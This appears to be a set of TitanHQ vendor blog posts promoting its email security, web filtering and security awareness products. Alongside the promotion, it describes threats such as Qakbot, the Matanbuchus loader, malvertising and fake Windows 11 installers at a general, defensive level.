SpamTitan Plus is a leading-edge artificial intelligence-driven anti-phishing solution from TitanHQ that provides better coverage than any other anti-phishing product on the market. The solution has 100% coverage of all current market-leading anti-phishing feeds, which gives users a significant uplift in phishing link detections and faster detection of phishing threats than any other product.
The solution is fed massive clickstream traffic from more than 600 million endpoints worldwide, and more than 10 million new, and never-before-seen phishing and malicious URLs are added to the solution and blocked for all users every single day. When a new, malicious URL is detected, it takes less than 5 minutes for all users of SpamTitan Plus to be protected. Independent tests have shown SpamTitan Plus is 1.6 times faster at detecting phishing URLs than any of the current market leaders and achieves a 1.5x increase in unique phishing URL detections.
When a user clicks a link in an email, the URL is checked in real-time, not just when the email is delivered. This is important as campaigns are often conducted where the destination URL has malicious content added after delivery to bypass email security defenses. When SpamTitan Plus checks the link, the destination URL is scanned to identify spoofing and login pages, redirects are followed, and many dynamic checks are performed. If the destination URL is determined to be malicious, the user will be directed to a block page.
SpamTitan Plus was launched by TitanHQ in December 2021, and it has already proven popular with businesses that need the very best protection against phishing attacks. TitanHQ has now made a major update to the solution to improve its predictive phishing detection capabilities.
One of the ways that phishing campaigns are conducted to evade security solutions is to use personalized URLs for each targeted company and victim. In a standard phishing campaign, the same URL would be used for the entire campaign. When that URL is detected as malicious, it will be blocked by email security solutions. If a unique URL is used in these campaigns, if it is identified as malicious and blocked, it does not affect any other emails in the campaign as they each has a different URL. URLs are personalized at the path or parameter level, and most anti-phishing solutions provide no protection against these malicious personalized URLs. The personalized URLs are used in phishing, social engineering, reputation attacks, and malware distribution.
The latest predictive functionality detects and blocks automated bot phishing campaigns and personalized URL attacks, ensuring users get the very best phishing protection. The new capabilities have already been added to SpamTitan Plus and made available to all users.
“With predictive phishing detection, SpamTitan Plus can now combat automated bot phishing. At TitanHQ we always strive to innovate and develop solutions that solve real-security problems and provide tangible value to our customers. The end goal is to have our partners and customers two or three steps ahead of the phishers and cybercriminals’ said Ronan Kavanagh, CEO, TitanHQ.
Qakbot malware is one of the oldest malware threats that is still in use, having first been detected in 2007. Qakbot malware – aka QBot, QuakBot, and Pinkslipbot – has seen extensive development over the years and still poses a major threat to businesses worldwide. QakBot malware started life as a banking Trojan that was used to steal sensitive financial information. Qakbot malware can now also steal sensitive data from browsers and emails and as with many other modular banking Trojans, it also serves as a malware loader and is used to deliver secondary malware payloads.
As was the case back in 2007, Qakbot malware is most commonly delivered via phishing emails, using links to malicious websites where the malware is downloaded or malicious email attachments. Once initial access is gained to a victim’s network, privileges are escalated, and the malware operator uses Microsoft tools for lateral movement – termed living-of-the-land. This method means additional tools do not need to be downloaded, which could be detected, and the attackers can hide their activity amongst legitimate use of the tools by IT teams.
Qakbot malware is known to use exploits for known vulnerabilities. Qakbot malware was recently observed attempting to exploit the Follina remote code execution vulnerability (CVE-2022-30190) in the Microsoft Support Diagnostic Tool (MSDT), which affects Windows 11 and prior versions and most versions of Office. The malware has also used an exploit for Zerologon, to name just a couple.
In addition to being able to read and exfiltrate email data, QakBot malware – like Emotet – can hijack message threats and self-propagate. An existing email thread is found, and a malicious link is inserted into the conversation. Since the email sent includes the text of the previous conversation between two individuals, there is a reasonable chance of the malicious website being visited and the file being downloaded and opened. One way of getting around spam filters is for the URL to be included but not be made clickable, which means it needs to be manually copied into the browser.
Qakbot malware is strongly associated with ransomware attacks. Once the operators of the malware have achieved their aims, they sell access to infected devices to other threat groups as a secondary revenue stream. For example, QakBot malware has been observed delivering Cobalt Strike beacons to victims’ devices, and access to those beacons is then sold to ransomware gangs. The malware has been used by various ransomware gangs, including ProLock, Black Basta, MegaCortex, Egregor, and REvil.
A 2022 analysis of the malware, published by DFIR, highlights the speed at which attacks occur. DBIR shared information about an attack in October in which the entire network was compromised in minutes. In this case, it is unclear how initial access was gained but it is likely that the malware was delivered via a phishing email with an infected Excel spreadsheet, which launched the Qakbot malware DLL loader. A scheduled task was created to elevate privileges to system level and Qakbot was then injected into many processes, including Microsoft Remote Assistance (mrsa.exe).
Within 30 minutes of initial access, browser data and emails had been stolen from the host and within 50 minutes the malware had spread to another workstation and the process had been repeated. In a very short space of time, all workstations had been infected. Qakbot malware will also steal Windows credentials by dumping the memory of the Local Security Authority Server Service (LSSAS) Typically, credentials are stolen within 50 minutes of initial access being gained.
Detecting the malware once it has been installed can be a challenge. The key to protecting against infections is to improve email defenses, as this is the most common attack vector. That means implementing an email security solution that is not reliant on signature-based detection and includes behavior-based detection methods such as sandboxing and outbound scanning to identify compromised mailboxes. These features are present in SpamTitan Email Security products. A web filter is also recommended. WebTitan can detect and block command and control communications and provides additional protection against malicious links in emails, providing time-of-click protection to prevent users from visiting malicious websites linked in emails.
It is important for businesses to take steps to improve web security and block the web-based component of phishing attacks and drive-by malware downloads, and one of most important steps to take is to protect browsers against malvertising.
What is Malvertising
Malvertising is the term given to the use of malicious online adverts for downloading malware or directing website traffic to attacker-controlled websites for phishing or other scams. Malicious adverts may be placed on compromised websites, but commonly they are added to legitimate ad networks, which website operators use for improving engagement and generating additional revenue. Third-party advertising blocks are used on many high-traffic websites, and if malicious adverts are added, they can be displayed on large numbers of high-traffic websites to huge volumes of website visitors. Since the adverts may be displayed on trusted websites, that trust is then transferred to the adverts. Website visitors may click the adverts and be directed to a malicious website. Worse, it is possible to embed malicious code into the adverts themselves, so it is not always necessary to click the advert to have malware downloaded.
Malvertising is a significant attack vector and is often used for malware distribution. The attacks can bypass in-built browser security features that protect against website redirects and pop-up adverts. It is also possible for attackers to create malvertising campaigns that are targeted at specific users, and only serve adverts to those users.
How to Defend Against Malvertising
Since people interact with the Internet using a web browser, web browsers should be secured to protect against malvertising. The malicious code in adverts can probe for and exploit vulnerabilities in web browsers. Those vulnerabilities may exist due to the use of an outdated web browser such as Internet Explorer, or a web browser that has not been updated to the latest version. Web browsers may have unsecure configurations that can be exploited, or users could be redirected to a malicious website or web application. Attackers also use malvertising to exploit human weaknesses, such as unsecure browsing habits or untrained or poorly trained users.
The threat from malvertising cannot be totally eliminated, but steps can be taken to reduce risk. Many of the protective measures are low-cost and can be implemented easily. The four main methods for protecting against malvertising, as recommended by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) are:
Standardize and secure web browsers
Deploy ad blocking software
Implement protective domain name system technologies
Isolate web browsers from operating systems
Standardize and secure web browsers
Limit the browsers, versions, and configurations that are used by your organization – The greater the variety, the higher the probability that vulnerabilities will exist that can be exploited. By restricting browsers, versions, and configurations, you will have a more consistent and easily managed network portfolio. You must then ensure that the browsers are kept up to date and new versions are installed as soon as possible after a version has been released.
Deploy ad blocking software
Ad-blocking software can prevent malicious adverts from being displayed. Ad blockers will remove adverts or prevent them from being displayed, often via a web browser extension. In theory, ad blockers are a great choice for defending against malvertising, but this option should be treated with caution as ad blockers have their own security concerns. Ad blockers may operate with high levels of privileges and may therefore access all data traffic between the user workstation and the network, which means they may be able to perform malicious actions with high levels of privileges. Malicious ad blockers have been detected, and some browser extensions accept payments from advertisers to ensure that paid for ads are allowlisted and are not blocked.
Isolate web browsers from operating systems
Browser isolation is an architectural decision that is used by many large organizations to defend against web-based threats, although the design, implementation, and maintenance of Internet browser isolation can be complex and may be beyond the capabilities of some small- and medium-sized businesses. Browser isolation involves creating a logical barrier between the web browser and other systems and operates on a zero-trust principle, assuming that all web traffic is untrustworthy and potentially malicious. Browser isolation is often achieved locally using a sandbox or virtual machine on the user’s computer.
Implement protective domain name system technologies
One of the best steps to take is to use protective domain name system (DNS) technologies such as WebTitan. WebTitan is a DNS-based web filtering solution for blocking access to malicious websites. When a malvertising attempts to redirect a user to a malicious domain, that redirect is blocked, and the user is directed to a locally hosted block page and is advised that the web resource cannot be accessed as a threat was detected. WebTitan can also be configured to block access to risky categories of websites and will block drive-by malware downloads.
WebTitan incorporates threat intelligence feeds and collects data from over 500 million endpoints worldwide to ensure that threats are rapidly blocked for all users when new threats are detected. According to CISA, 91% of malware uses DNS for cyberattacks. WebTitan can block malware command-and-control server communications.
Advice from the U.S. Cybersecurity and Infrastructure Security Agency
In 2021, CISA issued a Capacity Enhancement Guide for all federal agencies calling for them to take steps to secure browsers and defend against malvertising. This year, CISA has recommended all businesses and non-profit organizations follow the guidance and take steps to protect their browsers against malvertising.
Phishing emails are commonly used to distribute malware and in recent years malware loaders have been a common payload. Malware loaders include the likes of BazarLoader and Bumblebee, which are used to infect devices with the goal of delivering the malware and ransomware payloads of other threat groups.
Security researchers have identified a relatively new malware loader dubbed Matanbuchus that is being delivered via phishing emails. Like other malware loaders, Matanbuchus is operated under the malware-as-a-service model, and has been developed to stealthily download and execute second-stage malware payloads and executable files. The Matanbuchus loader has recently been observed dropping Cobalt Strike on infected systems. Cobalt Strike is a legitimate adversary simulation framework that is used in red team operations for detecting vulnerabilities that could potentially be exploited, but is also extensively used by criminal hackers for post-exploitation activities.
The Matanbuchus loader is currently being offered on Russian cybercrime forums for $2,500, and has been available since at least February 2021, with a malware developer operating under the moniker BelialDemon believed to be the developer of the malware. BelialDemon is known to have been involved in the development and sale of other malware loaders, such as TrumpLoader.
Matanbuchus, which is an alternate name for the demon Belial, can be used to launch an .exe or .dll file in the memory, add or modify task schedules, launch PowerShell commands, and execute standalone executable files to load a DLL. The malware has already been used in several attacks in the United States, including entities in the education sector.
Researchers at Palo Alto Networks’ Unit 42 team have identified phishing emails being used to deliver the Matanbuchus loader that use Excel documents with malicious macros. As is common in these types of phishing campaigns, if the user opens the attached file, they are informed that the document was created in an earlier version of Microsoft Excel, so the content cannot be viewed unless the user clicks on Enable Editing and then Enable Content. Should content be enabled, Excel 4.0 macros are then leveraged to drop and execute the Matanbuchus loader.
A campaign has also been detected that uses a .zip file attachment that contains an HTML file, which delivers a second .zip file that includes an MSI installer. If that file is executed, an error message is displayed indicating to the user that something has gone wrong, when in the background a DLL file is delivered and executed, which acts as the loader for delivering the Matanbuchus loader DLL file.
To block the delivery of malware loaders such as Matanbuchus, it is important to implement multiple cybersecurity solutions. A Spam filter such as SpamTitan can be used to block the delivery of the phishing emails. SpamTitan includes dual antivirus engines for detecting and blocking known malware and sandboxing to identify unknown malware through in-depth analysis of the behavior of attached files.
A web filter such as WebTitan should be used to block connections to malicious websites that host the malware. WebTitan can also be configured to block downloads of files often used to deliver malware and command-and-control center communications.
It is also strongly recommended to provide comprehensive security awareness training to all members of the workforce to explain the threat of phishing emails, explain the red flags to look for in emails, and not to open attachments unless they can be verified as authentic. TitanHQ can help in this regard through the SafeTitan Security Awareness Training solution, which includes a phishing simulation platform for simulating phishing emails to test how employees respond. For further information on these solutions, contact TitanHQ today.
TitanHQ has been included in the Expert Insights’ list of the Top 100 Most Innovative Cybersecurity Companies of 2022. Expert Insights is a leading online publication for businesses that conducts research into cloud-based business technologies and cybersecurity solutions to help businesses with their purchasing decisions. The site includes editorial buyers’ guides, industry analyses, interviews, and technical product reviews written by industry experts, and is visited by more than 80,000 business owners and IT admins each month.
In addition to an awards program that recognizes the best cloud-based and cybersecurity solutions – TitanHQ received 5 ‘Best of’ Awards in Spring 2022 – Expert Insights produces a list of the Top 100 Most Innovative Cybersecurity Companies. The list is divided into 12 categories and recognizes the most innovative companies that are developing cutting-edge solutions for businesses and consumers to help them deal with current and emerging cyber threats. TitanHQ was included in the list in the Email and Messaging Security category.
It has been a busy year for TitanHQ. The company has been taking great strides into the U.S. market and has significantly boosted its presence throughout North America and globally, and has brought in a host of new talent. The latest addition to the North American management team is channel veteran, Tom Watson, who was recently appointed as TitanHQ’s new Channel Chief. Watson is now working alongside another channel champion and recent appointee, Jeff Benedetti, who is TitanHQ’s new VP of Sales.
TitanHQ has recently bolstered its product portfolio with another product for boosting defenses against phishing and other cyber threats – The SafeTitan Security Awareness and Phishing Simulation planform, which follows on from the launch of a cutting-edge addition to the SpamTitan suite of products, SpamTitan Plus. SpamTitan Plus includes all of the market-leading anti-phishing feeds and provides unrivaled detection speeds of malicious URLs – 1.6x faster than the current market-leading anti-phishing solutions.
“The overwhelming feedback from our users and customer base has been that phishing attacks are becoming more advanced, proficient, and dangerous. Phishing is the number one problem to solve in the email security community,” said TitanHQ CEO, Ronan Kavanagh. “With that in mind, we’re delighted to have been recognized in the Email and Messaging Security Category. We will continue to innovate and provide email and messaging security solutions that MSPs can use to deliver a consistent, secure, and reliable experience to their customers,” added Kavanagh.
It can be a challenge for organizations to stay agile, competitive, and innovative in a digital world, especially when cyber threat actors are actively targeting businesses. Small- and medium-sized businesses are facing a multitude of threats, many of which target employees – a weak link in the security chain.
Cyberattacks can cause significant financial losses and irreparable damage to a business’s hard-earned reputation. While security solutions can be implemented to block those threats, cyber actors target a weak point in security – employees.
In addition to technical defenses, businesses need to create a human firewall through security awareness training. Digital security needs to be front and center of a business’s continued innovation, but it can be difficult to develop and maintain a cyber-savvy workforce, especially considering the rapidly changing threat landscape.
To help businesses succeed. TitanHQ, in partnership with the Oxford Cyber Academy, will be hosting a webinar to discuss employee cyber risks in growing organizations, and how to balance safety and agility.
During the webinar, attendees will be provided with valuable information on:
The rapidly changing threat landscape
What needs to be protected
The consequences of failing to protect digital assets and systems
How to balance technology and human cyber risks
How to improve employee security awareness and change employee behavior
A solution that makes it easy to provide intuitive, easy-to-understand, personalized, and targeted training that delivers it where it’s needed the most.
Join TitanHQ on June 7th where Nick Wilding, Neil Sinclair, Cyber Programme Lead, UK Police Crime Prevention Initiatives, and Richard Knowlton, Director of Security Studies at the Oxford Cyber Academy will discuss:
If you can’t make the event, register anyway and you will receive the webinar to watch on-demand at any time.
On June 1, 2022, Managed Service Providers (MSPs) have the opportunity of attending the ChannelNEXT in Toronto, ON. The event is an incredible opportunity for MSPs to gain practical insights on how to achieve greater success, with the one-day event focused on offering guidance and knowledge across all areas of MSP business, including business management, sales, marketing, leadership, and technology.
During the event, MSPs will discover how to overcome the common pain points such as hiring new talent and retaining employees, expanding the managed services they provide, scaling up their business, finding and retaining customers, and, importantly given the rapidly changing cyber threat landscape, how to protect themselves against cyberattacks and help their customers improve their security postures.
At this year’s event, ChannelNEXT will focus on four critical considerations for MSPs:
Solutions for cybersecurity, compliance, insurance, and best practices.
The methods that can be adopted for increasing sales in a digital-first economy.
The recent market developments in corporate digital transformation, as well as their implications.
How to increase recurring revenue through a stronger technology and service stack.
During the event, MSPs will be able to attend a wide range of learning sessions where they will hear from successful MSPs who will share the secrets that helped them achieve success and grow their businesses, keynote speeches from industry experts, and peer groups where they will be able to discuss the challenges they are facing and get tips and tricks on how to overcome those challenges. There will also be ample opportunities for networking.
TitanHQ is excited to be attending ChannelNEXT and having the opportunity to meet MSPs from Canada and beyond. Kyle Leyerzapf, Account Executive at TitanHQ, will be at the TitanHQ booth, and will be available to share the latest news from TitanHQ and will be happy to provide insights from his many years of experience within the channel and his wealth of knowledge about the growing concern about security threats targeting MSPs and their customers.
MSPs will also discover how TitanHQ solutions can be used to increase revenue, and how easy those solutions are to fit into an existing service stack through the TitanHQ MSP platform.
Tom Watson has taken on the role of Channel Chief at TitanHQ and will manage the company’s MSP tradeshows, roadshows, and webinars, and will oversee the new TitanHQ MSP program. Tom is a seasoned veteran of the IT channel, having worked as a network engineer, owned and operated an MSP business, provided MSP consultancy services and, for the past 24 years, has been a vendor evangelist for a swathe of tech companies. Tom has also previously served as Channel Chief for grade one vendors such as NinjaOne and Axcient. Tom is committed to keeping TitanHQ’s already exceptional level of service delivery in perfect alignment with changing MSP demands.
TitanHQ is undergoing a major expansion in the U.S. market to meet the massive demand for TitanHQ services from U.S. MSPs. Many international vendors have embarked upon an expansion in the United States but have overlooked the importance of bringing in locally sourced, experienced advisors to assist with serving the close-knit U.S. market. TitanHQ recognizes the importance of bringing in top local talent, hence the recruitment of Tome Watson. Tom will be based in TitanHQ’s new U.S. base in Shelton, Connecticut, where he will work alongside another recently appointed U.S. IT channel veteran, Jeff Benedetti, TitanHQ’s VP of Sales.
TitanHQ has been providing innovative solutions to managed service providers for more than 20 years and offers multiple award-winning SaaS solutions for email security, web filtering, email archiving, email encryption, and security awareness training. The products are used by more than 8,500 businesses worldwide and over 2,500 MSPs to protect against malware, ransomware, phishing, viruses, botnets, and other cyber threats, and to help businesses meet compliance requirements.
TitanHQ products have been built from the ground up for MSPs and save them considerable support and engineering time by stopping problems at the source. The solutions are a huge hit with MSPs due to their ease of implementation, ease of use, and seamless integration into the existing technology stacks of MSPs. The TitanHQ MSP-centric platform enables MSP partners to generate recurring revenues through the sales of TitanHQ solutions to SMBs, and easily scale and effectively manage their own businesses.
“I see my role as being more of a liaison than anything,” said Tom, regarding the recent appointment. “TitanHQ already has a fantastic offering. You’ll be hearing me talk about that in the future. For now, I think it’s more important to highlight the commitments TitanHQ has made to the channel. This is a company that is 100% dedicated to making sure they serve the MSP community.” Tom went on to say, “I’ve wanted to work for a rising cybersecurity company for quite a while now. Here I know I can use my skills and understanding of MSP operations, sales, and marketing to help MSPs succeed. Working together with TitanHQ we can give MSPs everything they need to provide quality cyber services to their clients.”
It is vital for any company looking to expand in the US and better serve the needs of MSPs to bring in MSP industry experts. “For over 20 years TitanHQ has worked with MSPs to develop best in class, advanced, and highly innovative cybersecurity solutions. We pride ourselves on the sophisticated yet easy-to-manage offerings we bring to the market. Bringing Tom on board is yet another leap to allow us to offer the best service to the MSP market,” said TitanHQ Marketing Director, Dryden Geary.
Many organizations punish employees who make cybersecurity mistakes and fail phishing simulations but punishing employees for failing phishing simulations is often not effective and can have unintended negative consequences.
Actions taken by companies when employees fail phishing simulations
Studies suggest that around 40% of companies punish employees for failing phishing simulations and for making other security mistakes. The actions taken can range in severity from naming and shaming employees, removing access privileges, losing other privileges and benefits, locking computers or blocking email until training has been completed, and disciplinary action, such as verbal and written warnings, and termination.
There naturally needs to be consequences if employees fail phishing simulations or make security mistakes, as if there are none, there will be no incentive for change. However, there are risks with using the stick rather than the carrot. Punishing employees for non-malicious security failures and failed phishing simulations often does not work.
Do you really want to create a culture of fear?
If you want to create a security culture in your organization you need to motivate your employees to become security titans, and that is unlikely to happen if the motivation comes from the threat of being fired if a mistake is made. Employees can become stressed and anxious if they are scared of severe punishments for security failures, especially if they have already failed a phishing simulation. That is unlikely to be beneficial for the company and could lead to the creation of a hostile work environment and loss of productivity. It could also serve to demonize the security team which is never a good thing.
If employees are scared about making mistakes, they may not report them when they happen
When employees make a mistake, such as clicking a link in a real phishing email or installing malware, and recognize the mistake, it is essential that they report it. Prompt action by the security team can be the difference between neutralizing the threat before any harm is caused and suffering an incredibly costly ransomware attack or data breach. If employees are worried about losing their jobs for making a mistake or suffering other serious consequences, they may avoid reporting the error.
Businesses need to be careful with punishing employees for non-malicious actions or security failures and should ensure that they make it clear to employees that the failure to report a known security mistake is a serious issue that could result in termination and will have far more serious consequences than the actual error.
Security awareness training should not be viewed as a punishment
If employees make security mistakes or fail phishing simulations it can be due to many reasons. The training provided has clearly not been effective has not been effective with certain employees and this could be due to the training material or the different needs of employees – It may not be a case of employees not paying attention or sloppy working practices.
When security mistakes are made or phishing simulations are failed, there is clearly a need for further training, but it is important that security awareness training is not seen as a punishment. It should be a positive experience and be explained that it is part of an ongoing educational process.
Consider real-time security awareness training
You should be providing security awareness training during the onboarding process, and annual training sessions are important, but if you want to create a security culture you need to go further. Cybersecurity newsletters, reminders, and additional training can be useful if they are not provided too regularly. Daily emails will be ignored, whereas monthly, bimonthly, or quarterly updates are more likely to be read and assimilated.
One of the best approaches to training is to provide basic training to everyone and then to provide behavior-driven, real-time security awareness training. When an employee makes a mistake, falls for a phishing simulation, or is discovered to have engaged in a risky behavior, an alert can be triggered and immediate training can be provided. This is bite-sized training that is relevant and specific to an action that was taken, that explains how the mistake was made, why it is a problem, and how it could have been avoided. Mistakes serve as educational triggers and can be turned into teachable moments and training provided in this way is likely to be much more effective than making an employee go through the same standard training program again.
The SafeTitan security awareness and phishing simulation platform
SafeTitan is the only behavior-driven security awareness platform that delivers training in real-time, allowing businesses to mitigate the growing problem of social engineering and advanced phishing attacks. The platform includes an extensive library of training courses, videos, and quizzes that businesses can use for greater general and custom training campaigns, and provides gamified, interactive, and enjoyable security awareness training sessions with short and efficient testing.
Training can be automatically generated in response to specific employee behaviors to ensure errors and risky behaviors are immediately tackled. The platform also includes fully automated simulated phishing attacks, using regularly updated phishing templates to match current attack trends. The training and simulations have been shown to reduce susceptibility to phishing by up to 92%. Users also benefit from enterprise-level reporting in an easily digestible format that demonstrates the ROI.
Contact TitanHQ today for more information and to sign up for a free trial of SafeTitan.
In October 2021, Microsoft launched its latest operating system – Windows 11 – and cybercriminals were quick to take advantage, offering free Windows 11 upgrades as a lure to trick people into installing malware.
Windows 11 has not been a roaring success so far. According to data from the IT asset management solution provider Lansweeper, on April 4, 2022, only 1.44% of corporate and personal devices had Windows 11 installed, which is less than the number that have Windows XP installed, for which support stopped being provided in 2014.
One of the main issues with Windows 11 is the stringent hardware compatibility requirements. One of the requirements for a Windows 11 upgrade is for devices to support Trusted Platform Module (TPM) version 2.0, which means any devices over 4 years old will not be able to have Windows 11 installed unless the hardware is upgraded.
Microsoft offers a tool on its website that will check whether a device has the hardware to support an upgrade to Windows 11, but any user who has not visited the official Microsoft website is unlikely to be unaware of the hardware restrictions, and it is those individuals who are being targeted and tricked into installing malware.
Malware is often distributed via peer-2-peer file-sharing networks and warez sites that offer pirated software, either packaged with the software installers or with the product activators and cracks that are used to generate valid licenses; however, the fake Windows installers are being pushed through search engine poisoning.
Search engine poisoning, also known as SEO poisoning, is the creation of malicious websites and the use of search engine optimization techniques to get the websites to appear high in the organic search engine listings for certain search terms. In this case, search terms related to Windows 11 downloads.
When a user enters a search string into Google, the malicious website appears in the listings. A variety of domains are used in the campaigns that at first glance appear to be legitimate, windows11-ugrade11.com being one example. The landing page on these websites include the Microsoft logo and menus and an attractive Get Windows 11 screen with a Download Now button.
One campaign has been identified that delivers a novel malware variant dubbed Inno Stealer, which is installed by an executable file in the downloaded ISO file. Inno Stealer can steal web browser cookies, passwords stored in browsers, data from the filesystem, and data in cryptocurrency wallets. Other malware variants are also being distributed using similar tactics. Fake windows installers have also been distributed via phishing emails. One campaign delivers Qbot malware via a password-protected ZIP file that contains a malicious MSI installer.
Spam filtering solutions can be used to block malware delivery via phishing emails; however, to block malware downloads from web browsing, a web filter is required. WebTitan is a DNS-based web filter that incorporates advanced DNS filtering controls to block access to malicious websites and prevent malware downloads.
WebTitan is fed threat intelligence from a network of 650 million worldwide users. Newly identified threats are immediately propagated to database deployments worldwide to provide coverage and protection against emerging, zero-hour threats. The solution can also be configured to block attempts by users to download file types often associated with malware, such as ISO and MSI files. WebTitan can handle any volume of usage with no latency, so users will be unaware that content is being filtered until they encounter a threat and are informed by WebTitan that the threat has been blocked.
If you want to improve your defenses against malware and phishing attacks via the Internet, contact TitanHQ today to find out more about WebTitan. Product demonstrations can be arranged on request and the full product is available on a free trial (with full support) to allow you to see for yourself how effective it is at blocking threats and how easy it is to install, set up, and use.
Expert Insights has announced its Spring 2022 Best-Of awards and TitanHQ has been given awards in 5 categories, including best-in-class awards for SpamTitan Email Security, WebTitan DNS Filter, ArcTitan Email Archiving, and SafeTitan Security Awareness training.
Expert Insights is an online publication that receives more than 80,000 visitors a month. Business owners and Information Technology professionals rely on the website which provides insights into the best business software solutions, along with blog posts, buyers’ guides, technical product reviews and analyses, interviews with industry experts, and reviews of software solutions by users of those solutions, who give accurate advice on their experiences and how the products perform in practice.
The Best-Of Awards recognize vendors and products that excel in their respective categories and help businesses achieve their goals. “Each of the services recognized in our awards are providing in many cases an essential service to their users, driving business growth, securing users in a challenging cybersecurity marketplace, and massively improving business efficiency,” Joel Witts, Expert Insights’ Content Director.
Each category includes a maximum of 11 products that have been analyzed by Expert Insights’ editorial and technical teams in the UK and US and have achieved excellent ratings from genuine users of the solutions. “These awards recognize the continued excellence of the providers in these categories,” said Witts.
At the Expert Insights Spring 2022 awards, TitanHQ was ranked the number 1 solution in the Best Email Security Gateway category for SpamTitan Email Security, ArcTitan Email Archiving was ranked number 1 in the Email Archiving for Business category, WebTitan DNS Filter ranked second in the Web Security category, and SafeTitan Security Awareness Training was ranked in the top 10 in two categories, Security Awareness Training and Phishing Simulation.
“The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy,” said TitanHQ CEO Ronan Kavanagh. “We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
Businesses need to invest in an advanced email security solution to block email-based cyberattacks and nuisance emails. SpamTitan, for instance, will block 99.99% of spam emails and 100% of known malware. SpamTitan includes advanced threat protection mechanisms and machine learning technology that can predict new attacks, along with sandboxing to identify zero-day malware threats.
The problem for businesses is that even with cutting-edge email security, some threats will bypass email defenses and will land in inboxes where they can be opened by employees. All it takes is for a single email to be opened by a single employee to give an attacker the foothold in the network that is needed to launch a devastating ransomware attack.
Technical defenses against phishing such as spam filters and web filters are important for cybersecurity, and alongside robust backup procedures, prompt patching, good password policies, and a next-generation firewall, your business will be well defended, but it is important not to neglect your human defenses, especially considering that 85% of cyberattacks involve human error.
Security awareness training for the workforce has always been important, but with cyberattacks on businesses now occurring at record rates, it is now a critical security measure. Security awareness training aims to teach the workforce the skills they need to be able to recognize and avoid security threats. Training should cover cybersecurity best practices such as setting strong passwords, never writing passwords down, and never accessing the network on a public Wi-Fi network without using a VPN, and other important security best practices.
The importance of training on how to identify phishing emails cannot be overstated. 9 out of 10 successful cyberattacks start with a phishing email. Phishing is concerned with tricking employees into disclosing their credentials or opening a malicious file that triggers a malware download. Attacks may also impersonate trusted individuals to trick employees into emailing sensitive data. Some phishing emails are easy to identify due to spelling mistakes, grammatical errors, and too-good-to-be-true offers, but many attacks are not so obvious. Employees need to be taught how to identify these emails, what to look for, and to be cautious when opening any email.
Spear phishing emails can be very convincing. They can be personalized, highly targeted, include the correct branding and logos, have spoofed sender names, and make perfectly plausible requests. Social engineering techniques are used to get the recipient to take the requested action and to do so without thinking, such as enabling content when opening an email attachment. Untrained employees cannot be expected to know about these cyberattacks and scams, and that enabling content in a document or spreadsheet will allow macros to run, which will silently download malware.
Security awareness training is important for everyone in the organization, from the CEO down. In fact, the CEO and other executives are the real prizes in phishing attacks as they have credentials that provide more extensive access to networks and sensitive data, so they need to also receive security awareness training. Providing regular security awareness training to the workforce is important, but so is testing the effectiveness of the training. Phishing simulations should be conducted to see if the workforce has taken the training on board. Simulation exercises provide immediate feedback on how the workforce will respond when a real threat is encountered. If the simulation is failed, employees will need to be given further training.
TitanHQ has developed SafeTitan to help businesses with their security awareness training. The platform provides real-time security awareness training to develop a human firewall to complement your technical cybersecurity defenses. The SafeTitan platform also allows businesses to run phishing simulations to see how effective the training has been and how employees will respond to social engineering and advanced phishing attacks when they are encountered.
For further information, get in touch with TitanHQ and take the most important step toward creating your human firewall.
Employees not wishing to get into legal trouble may choose to access questionable or illegal Internet content at work. Employers can protect against liability from such actions by their employees by implementing a solution to block this activity, and it is becoming increasingly important to do so as intellectual property owners are taking action against these activities.
Film Studios Crackdown on Illegal Downloads
When networks are used for illegal activities, action can be taken against the owners of those networks and the film and music industries have been particularly active in recent years as they attempt to stamp out piracy and copyright infringement. Several lawsuits have been filed against VPN providers over the use of their services for downloading pirated content. This month TorGuard settled a lawsuit filed by more than two dozen film studios over the use of its network for downloading pirated content and similar lawsuits have been filed against LiquidVPN and VPN.ht.
Lawsuits against individuals who download illegal content often do not make it to the courts due to the difficulty of proving that an individual downloaded copyright-infringing content on a particular IP address, but action is increasingly being taken for pirated movie downloads. Illegal downloads of the film Ava saw action taken by the movie studio Voltage Holdings LLC, which obtained a court order from broadband provider Virgin Media to release the details of customers who had downloaded the film.
In Canada, at least 17 lawsuits have recently been filed over copyright-infringing movie downloads, with more than 1,000 individuals named in the lawsuits. Some of those individuals have been ordered to pay $5,000 in damages for downloading films such as A Family Man and London Has Fallen. When multiple downloads of such material are occurring at a business, legal action could be taken against that business for failing to prevent the illegal activity.
Software Companies Take Action Over Unlicensed Software Use
It is not only pirated software downloads that can attract legal action. Siemens has taken action over copyright infringement related to the use of its software such as NX, Solid Edge, Femap, Star CCM, and FloTHERM. 142 users were identified as using unlicensed software and are the subject of the lawsuit. Software illegally downloaded and used by businesses can see damages imposed at many times the value of the software. While most businesses would not download unlicensed software, that may not be the case with all of their employees. Employees often choose to download software from file-sharing websites to help them be more efficient at work. Termed shadow IT, this practice not only exposes employers to legal risk, but there is also a very real cybersecurity risk.
Prevent Copyright-Infringing Downloads and Improve Cybersecurity with a Web Filter
Pirated software, and the associated product activators and cracks, are often bundled with malware, which is silently installed along with the pirated software. The malware can provide threat actors with remote access to corporate devices, and those devices can then be used for more extensive cyberattacks on the business. IT departments often discover unauthorized software has been installed on users’ devices when performing upgrades, software installations, repairs, and audits.
Businesses can protect against these illegal activities by employees by using a web filtering solution to block access to websites where pirated material is downloaded. There are also many other benefits of filtering the Internet and preventing access to certain types of web content.
Businesses can prevent the development of a hostile working environment by blocking access to content such as pornography, and they can ensure sufficient bandwidth is always available by restricting access to certain sites during busy times or working hours – YouTube for example.
The biggest benefit of implementing a web filter is blocking malicious websites, such as those known to be used for phishing and malware delivery. WebTitan Cloud, for instance, is fed threat intelligence from more than 650 million users worldwide. When a threat is identified, the solution is automatically updated to protect all users from accessing the malicious content.
Since WebTitan Cloud is a DNS-based web filter, there is no impact on Internet speed. Checks are performed at the DNS lookup stage of a web request, with content checked against databases and filtered in 5 microseconds. The solution can be configured to protect all users, including remote workers. The protection is applied no matter where the Internet is accessed.
If you want to protect your business from the legal risk associated with Illegal web activity, improve your defenses against phishing and malware, and make productivity gains by blocking access to non-essential Internet content, WebTitan Cloud is the ideal solution.
